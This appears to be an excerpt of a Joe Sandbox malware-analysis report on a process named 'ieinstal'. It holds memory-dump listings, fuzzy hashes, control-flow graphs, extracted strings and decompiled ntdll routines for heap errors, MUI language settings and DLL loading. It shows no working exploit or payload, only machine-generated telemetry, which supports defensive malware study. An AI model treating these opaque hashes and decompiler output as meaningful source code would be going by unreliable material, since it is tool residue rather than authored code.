                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 36b22f7c54ed84d738805e0e7b9d94f3f416058523195fa68158801a275ee779
                        • Instruction ID: 124baa00d307e333833cf0add9ed85597137f85ff9c401f9c61b65f89ea9baec
                        • Opcode Fuzzy Hash: 36b22f7c54ed84d738805e0e7b9d94f3f416058523195fa68158801a275ee779
                        • Instruction Fuzzy Hash: 65900261242041575946B15A440451B4016ABE46817D1C112E1404930C856798D7EA71
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 28 1ed49860-1ed4986c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 841247e33f933ccfd5ea323db0796ab0979d3d26c30fea165c40b7b1ecb7c3ca
                        • Instruction ID: 1e23902bbd3da956a1875555082d7daa78803f9b78604ff42f7803b92e255d56
                        • Opcode Fuzzy Hash: 841247e33f933ccfd5ea323db0796ab0979d3d26c30fea165c40b7b1ecb7c3ca
                        • Instruction Fuzzy Hash: B990027120100417D512615A450471B00199BD4681FD1C512E0414538D969789D3B571
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 31 1ed499a0-1ed499ac LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 3e798c494aee0dd4ec21c288da5685fcb58ad451ca0c9ff50fa51ece10429d45
                        • Instruction ID: ee7fddec6dd107b573a6b23fd81dbb908fb86bdefb26ab924844d899c9b7daa3
                        • Opcode Fuzzy Hash: 3e798c494aee0dd4ec21c288da5685fcb58ad451ca0c9ff50fa51ece10429d45
                        • Instruction Fuzzy Hash: 809002A134100447D501615A4414B1B0015DBE5741F91C115E1054534D865ACCD37576
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 30 1ed49910-1ed4991c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 56efc4b65d5edc0c60bdf051dbac3b8369af22c16995a1c9612e110c698397b0
                        • Instruction ID: aeab0814e45e479f7fa66cfa70d0aa4cdabc3401182abf878e7a83578975cf9c
                        • Opcode Fuzzy Hash: 56efc4b65d5edc0c60bdf051dbac3b8369af22c16995a1c9612e110c698397b0
                        • Instruction Fuzzy Hash: DF9002B120100407D541715A440475B00159BD4741F91C111E5054534E869A8DD67AB5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 2d065be 1 2d065c1-2d065e4 0->1 1->1 2 2d065e6-2d06621 TerminateThread 1->2 3 2d0662c-2d0663a 2->3 4 2d066b5-2d066c9 3->4 5 2d0663c-2d06643 3->5 5->4 6 2d06645-2d06649 5->6 6->4 7 2d0664b-2d0664f 6->7 7->4 8 2d06651-2d06655 7->8 8->4 9 2d06657-2d0665b 8->9 9->4 10 2d0665d-2d06661 9->10 10->4 11 2d06663-2d0666c 10->11 11->4 12 2d0666e-2d0667f 11->12 13 2d06680-2d0668c 12->13 14 2d06697-2d066b2 13->14 15 2d0668e-2d06692 13->15 15->4 16 2d06694-2d06695 15->16 16->13
                        APIs
                        • TerminateThread.KERNELBASE(-67E8FA2E), ref: 02D06621
                        Memory Dump Source
                        • Source File: 00000012.00000002.602573615.0000000002D06000.00000040.00000001.sdmp, Offset: 02D06000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2d06000_ieinstal.jbxd
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: e3bd13cbd5f98010b54027f4de454146ad153584fdb74afffbeca4373a96aa78
                        • Instruction ID: 66c5692c999bcdcf9e8174406811f41909a6ea63623d31b4db29b4f475e2e48b
                        • Opcode Fuzzy Hash: e3bd13cbd5f98010b54027f4de454146ad153584fdb74afffbeca4373a96aa78
                        • Instruction Fuzzy Hash: 9931BD75500391CFCB60CF64C8C8BA677E6AF14218F9591E9D4198B3B2D334C994CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 17 1ed4967a-1ed4967f 18 1ed49681-1ed49688 17->18 19 1ed4968f-1ed49696 LdrInitializeThunk 17->19
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 5ad577b9bfc31607e2a382606b8ff80983a72aa2280c42add41d6b2ad34bb7e7
                        • Instruction ID: bff615b52e5418df8355c0ecf15d027cb449f61d7d007588b3d2dc78aa359567
                        • Opcode Fuzzy Hash: 5ad577b9bfc31607e2a382606b8ff80983a72aa2280c42add41d6b2ad34bb7e7
                        • Instruction Fuzzy Hash: 58B09B719424C6CBD601D761460871B79117BD4741F66C155D1420651E4779C0D1F5B5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Strings
                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 1EDBB39B
                        • read from, xrefs: 1EDBB4AD, 1EDBB4B2
                        • The instruction at %p referenced memory at %p., xrefs: 1EDBB432
                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 1EDBB323
                        • Go determine why that thread has not released the critical section., xrefs: 1EDBB3C5
                        • The resource is owned shared by %d threads, xrefs: 1EDBB37E
                        • *** Inpage error in %ws:%s, xrefs: 1EDBB418
                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 1EDBB53F
                        • *** An Access Violation occurred in %ws:%s, xrefs: 1EDBB48F
                        • *** Resource timeout (%p) in %ws:%s, xrefs: 1EDBB352
                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 1EDBB305
                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 1EDBB484
                        • an invalid address, %p, xrefs: 1EDBB4CF
                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 1EDBB38F
                        • This failed because of error %Ix., xrefs: 1EDBB446
                        • *** then kb to get the faulting stack, xrefs: 1EDBB51C
                        • *** enter .exr %p for the exception record, xrefs: 1EDBB4F1
                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 1EDBB2DC
                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 1EDBB476
                        • The resource is owned exclusively by thread %p, xrefs: 1EDBB374
                        • write to, xrefs: 1EDBB4A6
                        • <unknown>, xrefs: 1EDBB27E, 1EDBB2D1, 1EDBB350, 1EDBB399, 1EDBB417, 1EDBB48E
                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 1EDBB314
                        • The critical section is owned by thread %p., xrefs: 1EDBB3B9
                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 1EDBB47D
                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 1EDBB3D6
                        • *** enter .cxr %p for the context, xrefs: 1EDBB50D
                        • The instruction at %p tried to %s , xrefs: 1EDBB4B6
                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 1EDBB2F3
                        • a NULL pointer, xrefs: 1EDBB4E0
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                        • API String ID: 0-108210295
                        • Opcode ID: c8e825c9fc62e242954ec554dd55e7259efae45478c68da5e865b84107db3a43
                        • Instruction ID: e3d8703b7d686960ccae1a2a8405617c40fd5156b854dea626c1f76ea7d8e365
                        • Opcode Fuzzy Hash: c8e825c9fc62e242954ec554dd55e7259efae45478c68da5e865b84107db3a43
                        • Instruction Fuzzy Hash: 4E81ED79900110FFCB259B06CC94EAB3F26BF47665F814754F8062B262E331DA51EBB2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 44%
                        			E1EDC1C06() {
                        				signed int _t27;
                        				char* _t104;
                        				char* _t105;
                        				intOrPtr _t113;
                        				intOrPtr _t115;
                        				intOrPtr _t117;
                        				intOrPtr _t119;
                        				intOrPtr _t120;
                        
                        				_t105 = 0x1ece48a4;
                        				_t104 = "HEAP: ";
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E1ED0B150();
                        				} else {
                        					E1ED0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				_push( *0x1edf589c);
                        				E1ED0B150("Heap error detected at %p (heap handle %p)\n",  *0x1edf58a0);
                        				_t27 =  *0x1edf5898; // 0x0
                        				if(_t27 <= 0xf) {
                        					switch( *((intOrPtr*)(_t27 * 4 +  &M1EDC1E96))) {
                        						case 0:
                        							_t105 = "heap_failure_internal";
                        							goto L21;
                        						case 1:
                        							goto L21;
                        						case 2:
                        							goto L21;
                        						case 3:
                        							goto L21;
                        						case 4:
                        							goto L21;
                        						case 5:
                        							goto L21;
                        						case 6:
                        							goto L21;
                        						case 7:
                        							goto L21;
                        						case 8:
                        							goto L21;
                        						case 9:
                        							goto L21;
                        						case 0xa:
                        							goto L21;
                        						case 0xb:
                        							goto L21;
                        						case 0xc:
                        							goto L21;
                        						case 0xd:
                        							goto L21;
                        						case 0xe:
                        							goto L21;
                        						case 0xf:
                        							goto L21;
                        					}
                        				}
                        				L21:
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E1ED0B150();
                        				} else {
                        					E1ED0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				_push(_t105);
                        				E1ED0B150("Error code: %d - %s\n",  *0x1edf5898);
                        				_t113 =  *0x1edf58a4; // 0x0
                        				if(_t113 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E1ED0B150();
                        					} else {
                        						E1ED0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E1ED0B150("Parameter1: %p\n",  *0x1edf58a4);
                        				}
                        				_t115 =  *0x1edf58a8; // 0x0
                        				if(_t115 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E1ED0B150();
                        					} else {
                        						E1ED0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E1ED0B150("Parameter2: %p\n",  *0x1edf58a8);
                        				}
                        				_t117 =  *0x1edf58ac; // 0x0
                        				if(_t117 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E1ED0B150();
                        					} else {
                        						E1ED0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E1ED0B150("Parameter3: %p\n",  *0x1edf58ac);
                        				}
                        				_t119 =  *0x1edf58b0; // 0x0
                        				if(_t119 != 0) {
                        					L41:
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E1ED0B150();
                        					} else {
                        						E1ED0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					_push( *0x1edf58b4);
                        					E1ED0B150("Last known valid blocks: before - %p, after - %p\n",  *0x1edf58b0);
                        				} else {
                        					_t120 =  *0x1edf58b4; // 0x0
                        					if(_t120 != 0) {
                        						goto L41;
                        					}
                        				}
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E1ED0B150();
                        				} else {
                        					E1ED0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				return E1ED0B150("Stack trace available at %p\n", 0x1edf58c0);
                        			}












                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                        • API String ID: 0-2897834094
                        • Opcode ID: d477b27fe7f89b3a96c1bde7b0e7015de8516e7042cc4acd466e8d026eaed90f
                        • Instruction ID: 5dd97c334e9c203eb6fcc5d042a655fc91d400e175606e5c65afaddff5ccb0d9
                        • Opcode Fuzzy Hash: d477b27fe7f89b3a96c1bde7b0e7015de8516e7042cc4acd466e8d026eaed90f
                        • Instruction Fuzzy Hash: 5661E8364141B4DFC6419BA6DD98E54B7F5EB04A70B49876EF80A5F380C735DC828F2A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E1ED13D34(signed int* __ecx) {
                        				signed int* _v8;
                        				char _v12;
                        				signed int* _v16;
                        				signed int* _v20;
                        				char _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				char _v36;
                        				signed int _v40;
                        				signed int _v44;
                        				signed int* _v48;
                        				signed int* _v52;
                        				signed int _v56;
                        				signed int _v60;
                        				char _v68;
                        				signed int _t140;
                        				signed int _t161;
                        				signed int* _t236;
                        				signed int* _t242;
                        				signed int* _t243;
                        				signed int* _t244;
                        				signed int* _t245;
                        				signed int _t255;
                        				void* _t257;
                        				signed int _t260;
                        				void* _t262;
                        				signed int _t264;
                        				void* _t267;
                        				signed int _t275;
                        				signed int* _t276;
                        				short* _t277;
                        				signed int* _t278;
                        				signed int* _t279;
                        				signed int* _t280;
                        				short* _t281;
                        				signed int* _t282;
                        				short* _t283;
                        				signed int* _t284;
                        				void* _t285;
                        
                        				_v60 = _v60 | 0xffffffff;
                        				_t280 = 0;
                        				_t242 = __ecx;
                        				_v52 = __ecx;
                        				_v8 = 0;
                        				_v20 = 0;
                        				_v40 = 0;
                        				_v28 = 0;
                        				_v32 = 0;
                        				_v44 = 0;
                        				_v56 = 0;
                        				_t275 = 0;
                        				_v16 = 0;
                        				if(__ecx == 0) {
                        					_t280 = 0xc000000d;
                        					_t140 = 0;
                        					L50:
                        					 *_t242 =  *_t242 | 0x00000800;
                        					_t242[0x13] = _t140;
                        					_t242[0x16] = _v40;
                        					_t242[0x18] = _v28;
                        					_t242[0x14] = _v32;
                        					_t242[0x17] = _t275;
                        					_t242[0x15] = _v44;
                        					_t242[0x11] = _v56;
                        					_t242[0x12] = _v60;
                        					return _t280;
                        				}
                        				if(E1ED11B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                        					_v56 = 1;
                        					if(_v8 != 0) {
                        						L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                        					}
                        					_v8 = _t280;
                        				}
                        				if(E1ED11B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                        					_v60 =  *_v8;
                        					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                        					_v8 = _t280;
                        				}
                        				if(E1ED11B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                        					L16:
                        					if(E1ED11B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                        						L28:
                        						if(E1ED11B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                        							L46:
                        							_t275 = _v16;
                        							L47:
                        							_t161 = 0;
                        							L48:
                        							if(_v8 != 0) {
                        								L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                        							}
                        							_t140 = _v20;
                        							if(_t140 != 0) {
                        								if(_t275 != 0) {
                        									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                        									_t275 = 0;
                        									_v28 = 0;
                        									_t140 = _v20;
                        								}
                        							}
                        							goto L50;
                        						}
                        						_t167 = _v12;
                        						_t255 = _v12 + 4;
                        						_v44 = _t255;
                        						if(_t255 == 0) {
                        							_t276 = _t280;
                        							_v32 = _t280;
                        						} else {
                        							_t276 = L1ED24620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                        							_t167 = _v12;
                        							_v32 = _t276;
                        						}
                        						if(_t276 == 0) {
                        							_v44 = _t280;
                        							_t280 = 0xc0000017;
                        							goto L46;
                        						} else {
                        							E1ED4F3E0(_t276, _v8, _t167);
                        							_v48 = _t276;
                        							_t277 = E1ED51370(_t276, 0x1ece4e90);
                        							_pop(_t257);
                        							if(_t277 == 0) {
                        								L38:
                        								_t170 = _v48;
                        								if( *_v48 != 0) {
                        									E1ED4BB40(0,  &_v68, _t170);
                        									if(L1ED143C0( &_v68,  &_v24) != 0) {
                        										_t280 =  &(_t280[0]);
                        									}
                        								}
                        								if(_t280 == 0) {
                        									_t280 = 0;
                        									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                        									_v44 = 0;
                        									_v32 = 0;
                        								} else {
                        									_t280 = 0;
                        								}
                        								_t174 = _v8;
                        								if(_v8 != 0) {
                        									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                        								}
                        								_v8 = _t280;
                        								goto L46;
                        							}
                        							_t243 = _v48;
                        							do {
                        								 *_t277 = 0;
                        								_t278 = _t277 + 2;
                        								E1ED4BB40(_t257,  &_v68, _t243);
                        								if(L1ED143C0( &_v68,  &_v24) != 0) {
                        									_t280 =  &(_t280[0]);
                        								}
                        								_t243 = _t278;
                        								_t277 = E1ED51370(_t278, 0x1ece4e90);
                        								_pop(_t257);
                        							} while (_t277 != 0);
                        							_v48 = _t243;
                        							_t242 = _v52;
                        							goto L38;
                        						}
                        					}
                        					_t191 = _v12;
                        					_t260 = _v12 + 4;
                        					_v28 = _t260;
                        					if(_t260 == 0) {
                        						_t275 = _t280;
                        						_v16 = _t280;
                        					} else {
                        						_t275 = L1ED24620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                        						_t191 = _v12;
                        						_v16 = _t275;
                        					}
                        					if(_t275 == 0) {
                        						_v28 = _t280;
                        						_t280 = 0xc0000017;
                        						goto L47;
                        					} else {
                        						E1ED4F3E0(_t275, _v8, _t191);
                        						_t285 = _t285 + 0xc;
                        						_v48 = _t275;
                        						_t279 = _t280;
                        						_t281 = E1ED51370(_v16, 0x1ece4e90);
                        						_pop(_t262);
                        						if(_t281 != 0) {
                        							_t244 = _v48;
                        							do {
                        								 *_t281 = 0;
                        								_t282 = _t281 + 2;
                        								E1ED4BB40(_t262,  &_v68, _t244);
                        								if(L1ED143C0( &_v68,  &_v24) != 0) {
                        									_t279 =  &(_t279[0]);
                        								}
                        								_t244 = _t282;
                        								_t281 = E1ED51370(_t282, 0x1ece4e90);
                        								_pop(_t262);
                        							} while (_t281 != 0);
                        							_v48 = _t244;
                        							_t242 = _v52;
                        						}
                        						_t201 = _v48;
                        						_t280 = 0;
                        						if( *_v48 != 0) {
                        							E1ED4BB40(_t262,  &_v68, _t201);
                        							if(L1ED143C0( &_v68,  &_v24) != 0) {
                        								_t279 =  &(_t279[0]);
                        							}
                        						}
                        						if(_t279 == 0) {
                        							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                        							_v28 = _t280;
                        							_v16 = _t280;
                        						}
                        						_t202 = _v8;
                        						if(_v8 != 0) {
                        							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                        						}
                        						_v8 = _t280;
                        						goto L28;
                        					}
                        				}
                        				_t214 = _v12;
                        				_t264 = _v12 + 4;
                        				_v40 = _t264;
                        				if(_t264 == 0) {
                        					_v20 = _t280;
                        				} else {
                        					_t236 = L1ED24620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                        					_t280 = _t236;
                        					_v20 = _t236;
                        					_t214 = _v12;
                        				}
                        				if(_t280 == 0) {
                        					_t161 = 0;
                        					_t280 = 0xc0000017;
                        					_v40 = 0;
                        					goto L48;
                        				} else {
                        					E1ED4F3E0(_t280, _v8, _t214);
                        					_t285 = _t285 + 0xc;
                        					_v48 = _t280;
                        					_t283 = E1ED51370(_t280, 0x1ece4e90);
                        					_pop(_t267);
                        					if(_t283 != 0) {
                        						_t245 = _v48;
                        						do {
                        							 *_t283 = 0;
                        							_t284 = _t283 + 2;
                        							E1ED4BB40(_t267,  &_v68, _t245);
                        							if(L1ED143C0( &_v68,  &_v24) != 0) {
                        								_t275 = _t275 + 1;
                        							}
                        							_t245 = _t284;
                        							_t283 = E1ED51370(_t284, 0x1ece4e90);
                        							_pop(_t267);
                        						} while (_t283 != 0);
                        						_v48 = _t245;
                        						_t242 = _v52;
                        					}
                        					_t224 = _v48;
                        					_t280 = 0;
                        					if( *_v48 != 0) {
                        						E1ED4BB40(_t267,  &_v68, _t224);
                        						if(L1ED143C0( &_v68,  &_v24) != 0) {
                        							_t275 = _t275 + 1;
                        						}
                        					}
                        					if(_t275 == 0) {
                        						L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                        						_v40 = _t280;
                        						_v20 = _t280;
                        					}
                        					_t225 = _v8;
                        					if(_v8 != 0) {
                        						L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                        					}
                        					_v8 = _t280;
                        					goto L16;
                        				}
                        			}











































                        Strings
                        • WindowsExcludedProcs, xrefs: 1ED13D6F
                        • Kernel-MUI-Language-SKU, xrefs: 1ED13F70
                        • Kernel-MUI-Language-Allowed, xrefs: 1ED13DC0
                        • Kernel-MUI-Number-Allowed, xrefs: 1ED13D8C
                        • Kernel-MUI-Language-Disallowed, xrefs: 1ED13E97
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                        • API String ID: 0-258546922
                        • Opcode ID: 5798357c6f38fc758a6d26c48c63486049dd1244c00f1aa0e55d17f066315976
                        • Instruction ID: a8491b304175158370b8a9262c790423a7e1f204fb27c2a0438528ad14f43e76
                        • Opcode Fuzzy Hash: 5798357c6f38fc758a6d26c48c63486049dd1244c00f1aa0e55d17f066315976
                        • Instruction Fuzzy Hash: 44F151B6D00659EFCB11CF99D940ADEFBB9FF08650F11066AE505EB650D730AE01CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 44%
                        			E1ED38E00(void* __ecx) {
                        				signed int _v8;
                        				char _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t32;
                        				intOrPtr _t35;
                        				intOrPtr _t43;
                        				void* _t46;
                        				intOrPtr _t47;
                        				void* _t48;
                        				signed int _t49;
                        				void* _t50;
                        				intOrPtr* _t51;
                        				signed int _t52;
                        				void* _t53;
                        				intOrPtr _t55;
                        
                        				_v8 =  *0x1edfd360 ^ _t52;
                        				_t49 = 0;
                        				_t48 = __ecx;
                        				_t55 =  *0x1edf8464; // 0x74790110
                        				if(_t55 == 0) {
                        					L9:
                        					if( !_t49 >= 0) {
                        						if(( *0x1edf5780 & 0x00000003) != 0) {
                        							E1ED85510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                        						}
                        						if(( *0x1edf5780 & 0x00000010) != 0) {
                        							asm("int3");
                        						}
                        					}
                        					return E1ED4B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                        				}
                        				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                        				_t43 =  *0x1edf7984; // 0x2fb2cf0
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                        					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                        					if(_t48 == _t43) {
                        						_t50 = 0x5c;
                        						if( *_t32 == _t50) {
                        							_t46 = 0x3f;
                        							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                        								_t32 = _t32 + 8;
                        							}
                        						}
                        					}
                        					_t51 =  *0x1edf8464; // 0x74790110
                        					 *0x1edfb1e0(_t47, _t32,  &_v12);
                        					_t49 =  *_t51();
                        					if(_t49 >= 0) {
                        						L8:
                        						_t35 = _v12;
                        						if(_t35 != 0) {
